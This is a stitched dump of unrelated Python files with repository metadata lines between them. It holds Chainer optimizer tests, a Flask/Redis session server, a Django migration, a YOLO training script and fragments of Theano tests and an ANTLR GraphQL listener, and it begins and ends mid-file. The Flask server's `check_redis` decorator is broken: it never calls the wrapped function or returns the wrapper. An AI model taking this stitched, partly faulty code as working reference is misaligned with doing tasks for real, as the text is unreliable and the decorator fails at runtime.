theano.OpWiseCLinker(schedule=sort_schedule_fn(str_cmp)) mode = theano.Mode(linker=linker) f = theano.function((x,), (y,), mode=mode) nodes = f.maker.linker.make_all()[-1] depends = make_depends() for a, b in zip(nodes[:-1], nodes[1:]): if not depends((b, a)): assert str(a) < str(b) def test_container_deepcopy(): """ This is a test to a work around a NumPy bug. """ t = theano.tensor.scalar() # It seam that numpy.asarray(0.).astype(floatX) can return a numpy # scalar with some NumPy Version. So we call numpy.asarray with # the dtype parameter. v = numpy.asarray(0., dtype=theano.config.floatX) assert isinstance(v, numpy.ndarray), type(v) for readonly in [True, False]: c = Container(t, [v], readonly=readonly) assert isinstance(c.storage[0], numpy.ndarray), (c.storage[0], type(c.storage[0])) assert c.storage[0].dtype == v.dtype, (c.storage[0].dtype, v.dtype) assert c.storage[0].dtype == c.type.dtype, (c.storage[0].dtype, c.type.dtype) d = deepcopy(c) assert isinstance(d.storage[0], numpy.ndarray), (d.storage[0], type(d.storage[0])) assert d.storage[0].dtype == v.dtype, (d.storage[0].dtype, v.dtype) assert d.storage[0].dtype == c.type.dtype, (d.storage[0].dtype, c.type.dtype)
28.339367
77
0.544627
5266fcbf47370baaeecc1ec0dcc6ca77236cec94
10,781
py
Python
tests/chainer_tests/optimizers_tests/test_optimizers.py
zjzh/chainer
e9da1423255c58c37be9733f51b158aa9b39dc93
[ "MIT" ]
3,705
2017-06-01T07:36:12.000Z
2022-03-30T10:46:15.000Z
tests/chainer_tests/optimizers_tests/test_optimizers.py
zjzh/chainer
e9da1423255c58c37be9733f51b158aa9b39dc93
[ "MIT" ]
5,998
2017-06-01T06:40:17.000Z
2022-03-08T01:42:44.000Z
tests/chainer_tests/optimizers_tests/test_optimizers.py
zjzh/chainer
e9da1423255c58c37be9733f51b158aa9b39dc93
[ "MIT" ]
1,150
2017-06-02T03:39:46.000Z
2022-03-29T02:29:32.000Z
import pickle import unittest import numpy as np import six import chainer from chainer import functions as F from chainer import optimizers from chainer import testing _all_optimizers = [ 'AdaDelta', 'AdaGrad', 'Adam', 'AdamW', 'AMSGrad', 'AdaBound', 'AMSBound', 'CorrectedMomentumSGD', 'MomentumSGD', 'MSVAG', 'NesterovAG', 'RMSprop', 'RMSpropGraves', 'SGD', 'SMORMS3', ] _parameterize_optimizers = testing.parameterize(*testing.product({ 'optimizer_impl': [getattr(chainer.optimizers, o) for o in _all_optimizers] })) class SimpleChain(chainer.Chain): def __init__(self, shape=()): super(SimpleChain, self).__init__() w_np = np.asarray(np.random.randn(*shape)).astype(np.float32) with self.init_scope(): self.w = chainer.Parameter(w_np, name='w') def __call__(self, x): return F.sum((x - self.w) ** 2) class TestAllOptimizersCoverage(unittest.TestCase): # Checks _all_optimizers covers all the built-in optimizers. def test_all_optimizers_coverage(self): module = chainer.optimizers module_optimizers = [] for name in dir(module): obj = getattr(module, name) if (isinstance(obj, type) and issubclass(obj, chainer.Optimizer)): module_optimizers.append(name) assert sorted(_all_optimizers) == sorted(module_optimizers) @testing.backend.inject_backend_tests( None, [ # CPU {}, # Intel {'use_ideep': True}, # CUDA {'use_cuda': True, 'cuda_device': 0}, {'use_cuda': True, 'cuda_device': 1}, # ChainerX {'use_chainerx': True, 'chainerx_device': 'native:0'}, {'use_chainerx': True, 'chainerx_device': 'cuda:0'}, {'use_chainerx': True, 'chainerx_device': 'cuda:1'}, ] ) @testing.parameterize(*( # Optimizers constructed with default arguments [ { 'optimizer': o, 'kwargs': {} } for o in _all_optimizers] # https://chainer/chainer/issues/7424 + [ { 'optimizer': 'Adam', 'kwargs': {'weight_decay_rate': 0.5}, }] )) @testing.parameterize(*testing.product( {'shape': [(2, 3), (), (1, 0, 2)]} )) class TestOptimizer(unittest.TestCase): def test_optimizer(self, backend_config): device = backend_config.device target = SimpleChain(self.shape) target.to_device(device) optimizer_cls = getattr(chainer.optimizers, self.optimizer) optimizer = optimizer_cls(**self.kwargs) optimizer.setup(target) x_np = np.asarray(np.random.randn(*self.shape)).astype(np.float32) x = chainer.Variable(device.send(x_np)) # Just ensures no error occurs. No numerical check is performed. optimizer.update(target, x) @_parameterize_optimizers class TestOptimizerHyperparameter(unittest.TestCase): def setUp(self): self.target = chainer.Link() with self.target.init_scope(): self.target.w = chainer.Parameter() def create(self, *args, **kwargs): self.optimizer = self.optimizer_impl(*args, **kwargs) self.optimizer.setup(self.target) def get_hyperparam(self, name): return getattr(self.target.w.update_rule.hyperparam, name) def test_hyperparams(self): # TODO(niboshi): The following optimizers do not pass this test # because their __init__ do not accept some hyperparameters. # The test should be fixed. if self.optimizer_impl in ( chainer.optimizers.AdamW, chainer.optimizers.AMSGrad, chainer.optimizers.AdaBound, chainer.optimizers.AMSBound, ): raise unittest.SkipTest( 'The optimizer is incompatible with this test') self.create() default = self.optimizer.hyperparam.get_dict() for name, default_value in six.iteritems(default): self.create() self.assertEqual(self.get_hyperparam(name), default_value) new_value = default_value + 0.1 self.create(**{name: new_value}) self.assertEqual(self.get_hyperparam(name), new_value) class WeightSaveHook(object): name = 'WeightSaveHook' call_for_each_param = True def __init__(self): self.value = None def __call__(self, rule, param): p, g = param.data, param.grad if p is None or g is None: return self.value = np.copy(p) @_parameterize_optimizers class TestOptimizerHooks(unittest.TestCase): def setUp(self): self.target = SimpleChain() def create(self, *args, **kwargs): self.optimizer = self.optimizer_impl(*args, **kwargs) self.optimizer.setup(self.target) def get_hyperparam(self, name): return getattr(self.target.w.update_rule.hyperparam, name) def test_hooks(self): w_pre = np.copy(self.target.w.data) h_pre = WeightSaveHook() h_post = WeightSaveHook() self.create() self.optimizer.add_hook(h_pre, timing='pre') self.optimizer.add_hook(h_post, name='WeightSaveHookPost', timing='post') x = chainer.Variable(np.array(5., dtype=np.float32)) self.optimizer.update(self.target, x) w_post = np.copy(self.target.w.data) self.assertEqual(w_pre, h_pre.value) self.assertEqual(w_post, h_post.value) self.assertNotEqual(h_pre.value, h_post.value) def test_hooks_auto(self): w_pre = np.copy(self.target.w.data) h_pre = WeightSaveHook() h_pre.timing = 'pre' h_post = WeightSaveHook() h_post.timing = 'post' self.create() self.optimizer.add_hook(h_pre, timing='auto') self.optimizer.add_hook(h_post, name='WeightSaveHookPost', timing='auto') x = chainer.Variable(np.array(5., dtype=np.float32)) self.optimizer.update(self.target, x) w_post = np.copy(self.target.w.data) self.assertEqual(w_pre, h_pre.value) self.assertEqual(w_post, h_post.value) self.assertNotEqual(h_pre.value, h_post.value) @_parameterize_optimizers class TestOptimizerPickable(unittest.TestCase): def setUp(self): self.target = SimpleChain() def create(self, *args, **kwargs): self.optimizer = self.optimizer_impl(*args, **kwargs) self.optimizer.setup(self.target) def get_hyperparam(self, name): return getattr(self.target.w.update_rule.hyperparam, name) def test_new_pickle(self): self.create() pickled_opt = pickle.dumps(self.optimizer) x = chainer.Variable(np.array(5., dtype=np.float32)) self.optimizer.update(self.target, x) w_post = np.copy(self.target.w.data) # Pickle has saved a copy of the target opt = pickle.loads(pickled_opt) opt.update(opt.target, x) pickled_w_post = np.copy(opt.target.w.data) self.assertEqual(w_post, pickled_w_post) def test_updated_pickle(self): self.create() x = chainer.Variable(np.array(5., dtype=np.float32)) self.optimizer.update(self.target, x) pickled_opt = pickle.dumps(self.optimizer) self.optimizer.update(self.target, x) w_post = np.copy(self.target.w.data) # Pickle has saved a copy of the target opt = pickle.loads(pickled_opt) opt.update(opt.target, x) pickled_w_post = np.copy(opt.target.w.data) self.assertEqual(w_post, pickled_w_post) @_parameterize_optimizers class TestOptimizerLossScaling(unittest.TestCase): def setUp(self): self.target = SimpleChain() def create(self, *args, **kwargs): self.optimizer = self.optimizer_impl(*args, **kwargs) self.optimizer.setup(self.target) def test_invalid_configs(self): self.create() with self.assertRaises(ValueError): self.optimizer.loss_scaling(interval=0) with self.assertRaises(ValueError): self.optimizer.loss_scaling(scale=-1) @testing.backend.inject_backend_tests( None, [ # CPU {}, # Intel {'use_ideep': True}, # CUDA {'use_cuda': True, 'cuda_device': 0}, # ChainerX {'use_chainerx': True, 'chainerx_device': 'native:0'}, {'use_chainerx': True, 'chainerx_device': 'cuda:0'}, ] ) class TestAdamW(unittest.TestCase): def test_adam_w(self, backend_config): xp = backend_config.xp device = backend_config.device link = chainer.Link(x=(1,)) link.to_device(device) opt = optimizers.Adam(eta=0.5, weight_decay_rate=0.1) opt.setup(link) link.x.data.fill(1) link.x.grad = device.send(xp.ones_like(link.x.data)) opt.update() # compare against the value computed with v5 impl testing.assert_allclose(link.x.data, np.array([0.9495]), atol=1e-7, rtol=1e-7) @testing.backend.inject_backend_tests( None, [ # CPU {}, # Intel {'use_ideep': True}, # CUDA {'use_cuda': True, 'cuda_device': 0}, # ChainerX {'use_chainerx': True, 'chainerx_device': 'native:0'}, {'use_chainerx': True, 'chainerx_device': 'cuda:0'}, ] ) class TestAMSGrad(unittest.TestCase): def test_amsgrad(self, backend_config): device = backend_config.device link = chainer.Link(x=(4,)) x = link.x x.data.fill(0) link.to_device(device) opt = optimizers.Adam(alpha=0.01, beta2=0.7, amsgrad=True) opt.setup(link) x.grad = device.send(np.array([1, -1, 10, -10], np.float32)) opt.update() testing.assert_allclose( x.update_rule.state['v'], [0.3, 0.3, 30, 30], atol=1e-7, rtol=1e-7) testing.assert_allclose( x.data, [-0.01, 0.01, -0.01, 0.01], atol=1e-7, rtol=1e-7) x.grad = device.send(np.array([-10, -10, -1, -1], np.float32)) opt.update() testing.assert_allclose( x.update_rule.state['v'], [30.21, 30.21, 21.3, 21.3], atol=1e-7, rtol=1e-7) testing.assert_allclose( x.update_rule.state['vhat'], [30.21, 30.21, 30, 30], atol=1e-7, rtol=1e-7) testing.assert_allclose( x.data, # result with NumPy [-0.00377703, 0.01745388, -0.01548985, 0.01686232], atol=1e-7, rtol=1e-7) testing.run_module(__name__, __file__)
29.137838
79
0.604675
a0d7c0c916f3ac9a4f2360f45a9979f8d9772f52
873
py
Python
martin.carrasco/Tarea3/server.py
Nadnus/Dev-Plats
e90bc4770b9c0b7898a19168f6310275e7aa6eab
[ "MIT" ]
null
null
null
martin.carrasco/Tarea3/server.py
Nadnus/Dev-Plats
e90bc4770b9c0b7898a19168f6310275e7aa6eab
[ "MIT" ]
null
null
null
martin.carrasco/Tarea3/server.py
Nadnus/Dev-Plats
e90bc4770b9c0b7898a19168f6310275e7aa6eab
[ "MIT" ]
null
null
null
from functools import wraps from flask import Flask, render_template, session, request, redirect, url_for import redis import os app = Flask(__name__) #redis_i = redis.from_url("redis://localhost:6379") redis_i = redis.StrictRedis(host='localhost', port=6379, db=0) app.secret_key = os.urandom(24) def check_redis(f): @wraps(f) def decorated_fun(*args, **kwargs): id = kwargs["id"] if id not in session and id in redis_i.lrange("user_list", 0, -1): redis_i.lrem("user_list", 0, id) @app.route("/<id>") @check_redis def index(id): if 'user' not in session: session['user'] = id redis_i.lpush("user_list", id) return "Logged!" @app.route("/users") def users(): l = b",".join(list(redis_i.lrange("user_list", 0, -1))) return l if __name__ == "__main__": app.run() redis_i.set("user_list", [])
24.25
77
0.642612
cb6529afd094479a69475c8939f6264cffea5aed
315
py
Python
src/web/models.py
canl/algo-trading
288f43a54d6594f79c79dc21f5534ad9aa785b29
[ "MIT" ]
11
2020-04-04T08:59:37.000Z
2020-12-25T20:21:05.000Z
src/web/models.py
canl/algo-trading
288f43a54d6594f79c79dc21f5534ad9aa785b29
[ "MIT" ]
1
2021-12-13T20:35:20.000Z
2021-12-13T20:35:20.000Z
src/web/models.py
canl/algo-trading
288f43a54d6594f79c79dc21f5534ad9aa785b29
[ "MIT" ]
3
2020-06-21T16:29:56.000Z
2020-07-18T15:15:01.000Z
from flask_login import UserMixin from src.web import db class User(db.Model, UserMixin): id = db.Column(db.Integer, primary_key=True) # primary keys are required by SQLAlchemy email = db.Column(db.String(100), unique=True) password = db.Column(db.String(100)) name = db.Column(db.String(1000))
28.636364
91
0.71746
3ef8bdeab62535a82ee775bed63e566846b51edd
480
py
Python
medusa_website/org_chart/migrations/0006_alter_committeerole_email.py
DeakinMeDUSA/medusa_website
2f865a34ca29b42f4376623659f0e5b3a457769d
[ "MIT" ]
null
null
null
medusa_website/org_chart/migrations/0006_alter_committeerole_email.py
DeakinMeDUSA/medusa_website
2f865a34ca29b42f4376623659f0e5b3a457769d
[ "MIT" ]
null
null
null
medusa_website/org_chart/migrations/0006_alter_committeerole_email.py
DeakinMeDUSA/medusa_website
2f865a34ca29b42f4376623659f0e5b3a457769d
[ "MIT" ]
null
null
null
# Generated by Django 3.2.10 on 2022-01-03 08:49 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('org_chart', '0005_committeememberrecord'), ] operations = [ migrations.AlterField( model_name='committeerole', name='email', field=models.EmailField(help_text='Must not be the personal email of the position holder', max_length=254, unique=True), ), ]
25.263158
132
0.641667
79fb6fce030cb7f946bca21bfd1d13c5b7400a15
9,069
py
Python
train.py
bklppr/yolo2_onnx
fcb85bd94e22c1c47f20fc13bb6ae3ac1ccd10f4
[ "MIT" ]
null
null
null
train.py
bklppr/yolo2_onnx
fcb85bd94e22c1c47f20fc13bb6ae3ac1ccd10f4
[ "MIT" ]
null
null
null
train.py
bklppr/yolo2_onnx
fcb85bd94e22c1c47f20fc13bb6ae3ac1ccd10f4
[ "MIT" ]
1
2018-07-11T22:44:11.000Z
2018-07-11T22:44:11.000Z
from __future__ import print_function import sys if len(sys.argv) != 4: print('Usage:') print('python train.py datacfg cfgfile weightfile') exit() import time import torch import torch.nn as nn import torch.nn.functional as F import torch.optim as optim import torch.backends.cudnn as cudnn from torchvision import datasets, transforms from torch.autograd import Variable import dataset import random import math import os from utils import * from cfg import parse_cfg from region_loss import RegionLoss from darknet import Darknet from models.tiny_yolo import TinyYoloNet # Training settings datacfg = sys.argv[1] cfgfile = sys.argv[2] weightfile = sys.argv[3] data_options = read_data_cfg(datacfg) net_options = parse_cfg(cfgfile)[0] trainlist = data_options['train'] testlist = data_options['valid'] backupdir = data_options['backup'] nsamples = file_lines(trainlist) gpus = data_options['gpus'] # e.g. 0,1,2,3 ngpus = len(gpus.split(',')) num_workers = int(data_options['num_workers']) batch_size = int(net_options['batch']) max_batches = int(net_options['max_batches']) learning_rate = float(net_options['learning_rate']) momentum = float(net_options['momentum']) decay = float(net_options['decay']) steps = [float(step) for step in net_options['steps'].split(',')] scales = [float(scale) for scale in net_options['scales'].split(',')] #Train parameters max_epochs = max_batches*batch_size/nsamples+1 use_cuda = True seed = int(time.time()) eps = 1e-5 save_interval = 10 # epoches dot_interval = 70 # batches # Test parameters conf_thresh = 0.25 nms_thresh = 0.4 iou_thresh = 0.5 if not os.path.exists(backupdir): os.mkdir(backupdir) ############### torch.manual_seed(seed) if use_cuda: os.environ['CUDA_VISIBLE_DEVICES'] = gpus torch.cuda.manual_seed(seed) model = Darknet(cfgfile) region_loss = model.loss model.load_weights(weightfile) layers = list(model.children())[0] for item in list(layers)[:-2]: item.requires_grad=False model.print_network() region_loss.seen = model.seen processed_batches = model.seen/batch_size init_width = model.width init_height = model.height init_epoch = 0 #model.seen/nsamples kwargs = {'num_workers': num_workers, 'pin_memory': True} if use_cuda else {} test_loader = torch.utils.data.DataLoader( dataset.listDataset(testlist, shape=(init_width, init_height), shuffle=False, transform=transforms.Compose([ transforms.ToTensor(), ]), train=False), batch_size=batch_size, shuffle=False, **kwargs) if use_cuda: if ngpus > 1: model = torch.nn.DataParallel(model).cuda() else: model = model.cuda() params_dict = dict(model.named_parameters()) params = [] for key, value in params_dict.items(): if key.find('.bn') >= 0 or key.find('.bias') >= 0: params += [{'params': [value], 'weight_decay': 0.0}] else: params += [{'params': [value], 'weight_decay': decay*batch_size}] optimizer = optim.SGD(model.parameters(), lr=learning_rate, momentum=momentum, dampening=0, weight_decay=decay*batch_size) def adjust_learning_rate(optimizer, batch): """Sets the learning rate to the initial LR decayed by 10 every 30 epochs""" lr = learning_rate for i in range(len(steps)): scale = scales[i] if i < len(scales) else 1 if batch >= steps[i]: lr = lr * scale if batch == steps[i]: break else: break for param_group in optimizer.param_groups: param_group['lr'] = lr/batch_size return lr def train(epoch): global processed_batches t0 = time.time() if ngpus > 1: cur_model = model.module else: cur_model = model train_loader = torch.utils.data.DataLoader( dataset.listDataset(trainlist, shape=(init_width, init_height), shuffle=True, transform=transforms.Compose([ transforms.ToTensor(), ]), train=True, seen=cur_model.seen, batch_size=batch_size, num_workers=num_workers), batch_size=batch_size, shuffle=False, **kwargs) lr = learning_rate #adjust_learning_rate(optimizer, processed_batches) logging('epoch %d, processed %d samples, lr %f' % (epoch, epoch * len(train_loader.dataset), lr)) model.train() t1 = time.time() avg_time = torch.zeros(9) for batch_idx, (data, target) in enumerate(train_loader): t2 = time.time() # adjust_learning_rate(optimizer, processed_batches) processed_batches = processed_batches + 1 #if (batch_idx+1) % dot_interval == 0: # sys.stdout.write('.') if use_cuda: data = data.cuda() #target= target.cuda() t3 = time.time() data, target = Variable(data), Variable(target) t4 = time.time() optimizer.zero_grad() t5 = time.time() output = model(data) t6 = time.time() region_loss.seen = region_loss.seen + data.data.size(0) loss = region_loss(output, target) t7 = time.time() loss.backward() t8 = time.time() optimizer.step() t9 = time.time() if False and batch_idx > 1: avg_time[0] = avg_time[0] + (t2-t1) avg_time[1] = avg_time[1] + (t3-t2) avg_time[2] = avg_time[2] + (t4-t3) avg_time[3] = avg_time[3] + (t5-t4) avg_time[4] = avg_time[4] + (t6-t5) avg_time[5] = avg_time[5] + (t7-t6) avg_time[6] = avg_time[6] + (t8-t7) avg_time[7] = avg_time[7] + (t9-t8) avg_time[8] = avg_time[8] + (t9-t1) ('-------------------------------') print(' load data : %f' % (avg_time[0]/(batch_idx))) print(' cpu to cuda : %f' % (avg_time[1]/(batch_idx))) print('cuda to variable : %f' % (avg_time[2]/(batch_idx))) print(' zero_grad : %f' % (avg_time[3]/(batch_idx))) print(' forward feature : %f' % (avg_time[4]/(batch_idx))) print(' forward loss : %f' % (avg_time[5]/(batch_idx))) print(' backward : %f' % (avg_time[6]/(batch_idx))) print(' step : %f' % (avg_time[7]/(batch_idx))) print(' total : %f' % (avg_time[8]/(batch_idx))) t1 = time.time() print('') t1 = time.time() logging('training with %f samples/s' % (len(train_loader.dataset)/(t1-t0))) if (epoch+1) % save_interval == 0: logging('save weights to %s/%06d.weights' % (backupdir, epoch+1)) cur_model.seen = (epoch + 1) * len(train_loader.dataset) cur_model.save_weights('%s/%06d.weights' % (backupdir, epoch+1)) def test(epoch): def truths_length(truths): for i in range(50): if truths[i][1] == 0: return i model.eval() if ngpus > 1: cur_model = model.module else: cur_model = model num_classes = cur_model.num_classes anchors = cur_model.anchors num_anchors = cur_model.num_anchors total = 0.0 proposals = 0.0 correct = 0.0 for batch_idx, (data, target) in enumerate(test_loader): if use_cuda: data = data.cuda() data = Variable(data, volatile=True) output = model(data).data all_boxes = get_region_boxes(output, conf_thresh, num_classes, anchors, num_anchors) for i in range(output.size(0)): boxes = all_boxes[i] boxes = nms(boxes, nms_thresh) truths = target[i].view(-1, 5) num_gts = truths_length(truths) total = total + num_gts for i in range(len(boxes)): if boxes[i][4] > conf_thresh: proposals = proposals+1 for i in range(num_gts): box_gt = [truths[i][1], truths[i][2], truths[i][3], truths[i][4], 1.0, 1.0, truths[i][0]] best_iou = 0 best_j = -1 for j in range(len(boxes)): iou = bbox_iou(box_gt, boxes[j], x1y1x2y2=False) if iou > best_iou: best_j = j best_iou = iou if best_iou > iou_thresh and boxes[best_j][6] == box_gt[6]: correct = correct+1 precision = 1.0*correct/(proposals+eps) recall = 1.0*correct/(total+eps) fscore = 2.0*precision*recall/(precision+recall+eps) logging("precision: %f, recall: %f, fscore: %f" % (precision, recall, fscore)) evaluate = False if evaluate: logging('evaluating ...') test(0) else: for epoch in range(int(init_epoch), int(max_epochs)): train(epoch) test(epoch)
33.839552
122
0.582424
0d928312a375c95ae1bbf7deb1d0053d3397e001
22,980
py
Python
schemagen/antlr/GraphQLListener.py
GoZaddy/SchemaGen
c8374382f6b52ad3cec398c77fd5bc90fe891818
[ "MIT" ]
3
2021-03-26T22:51:41.000Z
2021-03-27T15:17:24.000Z
schemagen/antlr/GraphQLListener.py
GoZaddy/SchemaGen
c8374382f6b52ad3cec398c77fd5bc90fe891818
[ "MIT" ]
null
null
null
schemagen/antlr/GraphQLListener.py
GoZaddy/SchemaGen
c8374382f6b52ad3cec398c77fd5bc90fe891818
[ "MIT" ]
null
null
null
# Generated from GraphQL.g4 by ANTLR 4.9 from antlr4 import * if __name__ is not None and "." in __name__: from .GraphQLParser import GraphQLParser else: from GraphQLParser import GraphQLParser # This class defines a complete listener for a parse tree produced by GraphQLParser. class GraphQLListener(ParseTreeListener): # Enter a parse tree produced by GraphQLParser#document. def enterDocument(self, ctx:GraphQLParser.DocumentContext): pass # Exit a parse tree produced by GraphQLParser#document. def exitDocument(self, ctx:GraphQLParser.DocumentContext): pass # Enter a parse tree produced by GraphQLParser#definition. def enterDefinition(self, ctx:GraphQLParser.DefinitionContext): pass # Exit a parse tree produced by GraphQLParser#definition. def exitDefinition(self, ctx:GraphQLParser.DefinitionContext): pass # Enter a parse tree produced by GraphQLParser#executableDefinition. def enterExecutableDefinition(self, ctx:GraphQLParser.ExecutableDefinitionContext): pass # Exit a parse tree produced by GraphQLParser#executableDefinition. def exitExecutableDefinition(self, ctx:GraphQLParser.ExecutableDefinitionContext): pass # Enter a parse tree produced by GraphQLParser#operationDefinition. def enterOperationDefinition(self, ctx:GraphQLParser.OperationDefinitionContext): pass # Exit a parse tree produced by GraphQLParser#operationDefinition. def exitOperationDefinition(self, ctx:GraphQLParser.OperationDefinitionContext): pass # Enter a parse tree produced by GraphQLParser#operationType. def enterOperationType(self, ctx:GraphQLParser.OperationTypeContext): pass # Exit a parse tree produced by GraphQLParser#operationType. def exitOperationType(self, ctx:GraphQLParser.OperationTypeContext): pass # Enter a parse tree produced by GraphQLParser#selectionSet. def enterSelectionSet(self, ctx:GraphQLParser.SelectionSetContext): pass # Exit a parse tree produced by GraphQLParser#selectionSet. def exitSelectionSet(self, ctx:GraphQLParser.SelectionSetContext): pass # Enter a parse tree produced by GraphQLParser#selection. def enterSelection(self, ctx:GraphQLParser.SelectionContext): pass # Exit a parse tree produced by GraphQLParser#selection. def exitSelection(self, ctx:GraphQLParser.SelectionContext): pass # Enter a parse tree produced by GraphQLParser#field. def enterField(self, ctx:GraphQLParser.FieldContext): pass # Exit a parse tree produced by GraphQLParser#field. def exitField(self, ctx:GraphQLParser.FieldContext): pass # Enter a parse tree produced by GraphQLParser#arguments. def enterArguments(self, ctx:GraphQLParser.ArgumentsContext): pass # Exit a parse tree produced by GraphQLParser#arguments. def exitArguments(self, ctx:GraphQLParser.ArgumentsContext): pass # Enter a parse tree produced by GraphQLParser#argument. def enterArgument(self, ctx:GraphQLParser.ArgumentContext): pass # Exit a parse tree produced by GraphQLParser#argument. def exitArgument(self, ctx:GraphQLParser.ArgumentContext): pass # Enter a parse tree produced by GraphQLParser#alias. def enterAlias(self, ctx:GraphQLParser.AliasContext): pass # Exit a parse tree produced by GraphQLParser#alias. def exitAlias(self, ctx:GraphQLParser.AliasContext): pass # Enter a parse tree produced by GraphQLParser#fragmentSpread. def enterFragmentSpread(self, ctx:GraphQLParser.FragmentSpreadContext): pass # Exit a parse tree produced by GraphQLParser#fragmentSpread. def exitFragmentSpread(self, ctx:GraphQLParser.FragmentSpreadContext): pass # Enter a parse tree produced by GraphQLParser#fragmentDefinition. def enterFragmentDefinition(self, ctx:GraphQLParser.FragmentDefinitionContext): pass # Exit a parse tree produced by GraphQLParser#fragmentDefinition. def exitFragmentDefinition(self, ctx:GraphQLParser.FragmentDefinitionContext): pass # Enter a parse tree produced by GraphQLParser#fragmentName. def enterFragmentName(self, ctx:GraphQLParser.FragmentNameContext): pass # Exit a parse tree produced by GraphQLParser#fragmentName. def exitFragmentName(self, ctx:GraphQLParser.FragmentNameContext): pass # Enter a parse tree produced by GraphQLParser#typeCondition. def enterTypeCondition(self, ctx:GraphQLParser.TypeConditionContext): pass # Exit a parse tree produced by GraphQLParser#typeCondition. def exitTypeCondition(self, ctx:GraphQLParser.TypeConditionContext): pass # Enter a parse tree produced by GraphQLParser#inlineFragment. def enterInlineFragment(self, ctx:GraphQLParser.InlineFragmentContext): pass # Exit a parse tree produced by GraphQLParser#inlineFragment. def exitInlineFragment(self, ctx:GraphQLParser.InlineFragmentContext): pass # Enter a parse tree produced by GraphQLParser#value. def enterValue(self, ctx:GraphQLParser.ValueContext): pass # Exit a parse tree produced by GraphQLParser#value. def exitValue(self, ctx:GraphQLParser.ValueContext): pass # Enter a parse tree produced by GraphQLParser#intValue. def enterIntValue(self, ctx:GraphQLParser.IntValueContext): pass # Exit a parse tree produced by GraphQLParser#intValue. def exitIntValue(self, ctx:GraphQLParser.IntValueContext): pass # Enter a parse tree produced by GraphQLParser#floatValue. def enterFloatValue(self, ctx:GraphQLParser.FloatValueContext): pass # Exit a parse tree produced by GraphQLParser#floatValue. def exitFloatValue(self, ctx:GraphQLParser.FloatValueContext): pass # Enter a parse tree produced by GraphQLParser#booleanValue. def enterBooleanValue(self, ctx:GraphQLParser.BooleanValueContext): pass # Exit a parse tree produced by GraphQLParser#booleanValue. def exitBooleanValue(self, ctx:GraphQLParser.BooleanValueContext): pass # Enter a parse tree produced by GraphQLParser#stringValue. def enterStringValue(self, ctx:GraphQLParser.StringValueContext): pass # Exit a parse tree produced by GraphQLParser#stringValue. def exitStringValue(self, ctx:GraphQLParser.StringValueContext): pass # Enter a parse tree produced by GraphQLParser#nullValue. def enterNullValue(self, ctx:GraphQLParser.NullValueContext): pass # Exit a parse tree produced by GraphQLParser#nullValue. def exitNullValue(self, ctx:GraphQLParser.NullValueContext): pass # Enter a parse tree produced by GraphQLParser#enumValue. def enterEnumValue(self, ctx:GraphQLParser.EnumValueContext): pass # Exit a parse tree produced by GraphQLParser#enumValue. def exitEnumValue(self, ctx:GraphQLParser.EnumValueContext): pass # Enter a parse tree produced by GraphQLParser#listValue. def enterListValue(self, ctx:GraphQLParser.ListValueContext): pass # Exit a parse tree produced by GraphQLParser#listValue. def exitListValue(self, ctx:GraphQLParser.ListValueContext): pass # Enter a parse tree produced by GraphQLParser#objectValue. def enterObjectValue(self, ctx:GraphQLParser.ObjectValueContext): pass # Exit a parse tree produced by GraphQLParser#objectValue. def exitObjectValue(self, ctx:GraphQLParser.ObjectValueContext): pass # Enter a parse tree produced by GraphQLParser#objectField. def enterObjectField(self, ctx:GraphQLParser.ObjectFieldContext): pass # Exit a parse tree produced by GraphQLParser#objectField. def exitObjectField(self, ctx:GraphQLParser.ObjectFieldContext): pass # Enter a parse tree produced by GraphQLParser#variable. def enterVariable(self, ctx:GraphQLParser.VariableContext): pass # Exit a parse tree produced by GraphQLParser#variable. def exitVariable(self, ctx:GraphQLParser.VariableContext): pass # Enter a parse tree produced by GraphQLParser#variableDefinitions. def enterVariableDefinitions(self, ctx:GraphQLParser.VariableDefinitionsContext): pass # Exit a parse tree produced by GraphQLParser#variableDefinitions. def exitVariableDefinitions(self, ctx:GraphQLParser.VariableDefinitionsContext): pass # Enter a parse tree produced by GraphQLParser#variableDefinition. def enterVariableDefinition(self, ctx:GraphQLParser.VariableDefinitionContext): pass # Exit a parse tree produced by GraphQLParser#variableDefinition. def exitVariableDefinition(self, ctx:GraphQLParser.VariableDefinitionContext): pass # Enter a parse tree produced by GraphQLParser#defaultValue. def enterDefaultValue(self, ctx:GraphQLParser.DefaultValueContext): pass # Exit a parse tree produced by GraphQLParser#defaultValue. def exitDefaultValue(self, ctx:GraphQLParser.DefaultValueContext): pass # Enter a parse tree produced by GraphQLParser#type_. def enterType_(self, ctx:GraphQLParser.Type_Context): pass # Exit a parse tree produced by GraphQLParser#type_. def exitType_(self, ctx:GraphQLParser.Type_Context): pass # Enter a parse tree produced by GraphQLParser#namedType. def enterNamedType(self, ctx:GraphQLParser.NamedTypeContext): pass # Exit a parse tree produced by GraphQLParser#namedType. def exitNamedType(self, ctx:GraphQLParser.NamedTypeContext): pass # Enter a parse tree produced by GraphQLParser#listType. def enterListType(self, ctx:GraphQLParser.ListTypeContext): pass # Exit a parse tree produced by GraphQLParser#listType. def exitListType(self, ctx:GraphQLParser.ListTypeContext): pass # Enter a parse tree produced by GraphQLParser#directives. def enterDirectives(self, ctx:GraphQLParser.DirectivesContext): pass # Exit a parse tree produced by GraphQLParser#directives. def exitDirectives(self, ctx:GraphQLParser.DirectivesContext): pass # Enter a parse tree produced by GraphQLParser#directive. def enterDirective(self, ctx:GraphQLParser.DirectiveContext): pass # Exit a parse tree produced by GraphQLParser#directive. def exitDirective(self, ctx:GraphQLParser.DirectiveContext): pass # Enter a parse tree produced by GraphQLParser#typeSystemDefinition. def enterTypeSystemDefinition(self, ctx:GraphQLParser.TypeSystemDefinitionContext): pass # Exit a parse tree produced by GraphQLParser#typeSystemDefinition. def exitTypeSystemDefinition(self, ctx:GraphQLParser.TypeSystemDefinitionContext): pass # Enter a parse tree produced by GraphQLParser#typeSystemExtension. def enterTypeSystemExtension(self, ctx:GraphQLParser.TypeSystemExtensionContext): pass # Exit a parse tree produced by GraphQLParser#typeSystemExtension. def exitTypeSystemExtension(self, ctx:GraphQLParser.TypeSystemExtensionContext): pass # Enter a parse tree produced by GraphQLParser#schemaDefinition. def enterSchemaDefinition(self, ctx:GraphQLParser.SchemaDefinitionContext): pass # Exit a parse tree produced by GraphQLParser#schemaDefinition. def exitSchemaDefinition(self, ctx:GraphQLParser.SchemaDefinitionContext): pass # Enter a parse tree produced by GraphQLParser#rootOperationTypeDefinition. def enterRootOperationTypeDefinition(self, ctx:GraphQLParser.RootOperationTypeDefinitionContext): pass # Exit a parse tree produced by 